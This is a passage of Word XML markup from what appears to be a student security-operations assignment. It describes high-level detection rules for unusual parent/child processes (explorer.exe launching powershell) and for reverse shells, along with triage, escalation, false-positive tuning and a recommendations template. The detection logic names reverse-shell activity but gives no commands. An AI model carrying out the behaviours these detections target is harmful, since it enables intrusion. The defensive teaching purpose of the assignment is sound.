        <w:t xml:space="preserve">2)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Detection name: Unusual Parent/Child relationship</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Logic: If the event shows an unusual parent/child relationship, then view the log for more information.  For example, explorer.exe opens powershell to run code that may be malicious.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Data:  Check the event logs. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3)</w:t>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Name:   Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Logic:  If the system is making unexpected connections on known ports, then investigate the logs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Data: Check the logs for indications that the connection was completed.</w:t>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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOC WORKFLOW INTEGRATION</w:t>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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Each action would create an entry into the logs based on what looks to be unusual behaviour.  To do the triage, check SIEM using the appropriate log files, read it carefully to determine if the threat is legitimate or a false positive.  If the event creates further activity, such as opening powershell to execute code, escalate the event.  Depending on the level of the threat, escalation with low, med, or high severity should occur. For example, if the event targets an important person, department or information, then escalate the event  with high severity.</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">False Positives and Tuning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Any behaviour that looks, on the surface, like malicious behavior, could trigger a false positive.  For example, opening an email from an unusual source or clicking a misspelled zip file. To reduce the number of False Positives events, a review of past false positive results and then an adjustment of the detection levels and rules accordingly.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection Gaps</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Discuss</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">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1">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">portions of the attack that may not be detected</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">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3">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">additional logging or tooling that would improve visibility</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">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5">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🔹</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">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8">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Improvements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">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A">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">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C">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">block malicious domains</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">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7E">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">improve email filtering</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">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1">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Short-Term Improvements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">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4">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">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6">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">improve logging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">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8">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">deploy endpoint monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">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A">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Long-Term Improvements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">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C">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">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8E">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user awareness training</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">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0">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">enhanced detection tooling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">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2">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">🔹</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Reflection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">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5">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">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7">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">what was challenging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">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9">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">what you learned about detection design</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="38556a"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">what you would improve</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
